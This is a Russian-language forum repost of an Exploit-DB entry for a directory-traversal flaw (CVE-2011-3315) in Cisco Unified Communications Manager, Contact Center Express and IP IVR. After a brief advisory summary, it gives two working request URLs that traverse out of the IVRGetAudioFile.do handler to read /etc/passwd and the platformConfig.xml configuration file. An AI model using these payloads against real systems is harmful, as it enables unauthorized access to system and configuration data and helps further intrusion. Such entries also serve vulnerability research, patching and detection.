Exploit Cisco - 'file' Directory Traversal

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
36256
Проверка EDB
  1. Пройдено
Автор
SANDRO GAUCI
Тип уязвимости
REMOTE
Платформа
HARDWARE
CVE
cve-2011-3315
Дата публикации
2011-10-26
Код:
source: https://www.securityfocus.com/bid/50372/info

Multiple Cisco products are prone to a directory-traversal vulnerability.

Exploiting this issue will allow an attacker to read arbitrary files from locations outside of the application's current directory. This could help the attacker launch further attacks.

This issue is tracked by Cisco BugID CSCts44049 and CSCth09343.

The following products are affected:

Cisco Unified IP Interactive Voice Response
Cisco Unified Contact Center Express
Cisco Unified Communications Manager 

http://www.example.com/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd

http://www.example.com/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../usr/local/platform/conf/platformConfig.xml
 
Источник
www.exploit-db.com

Похожие темы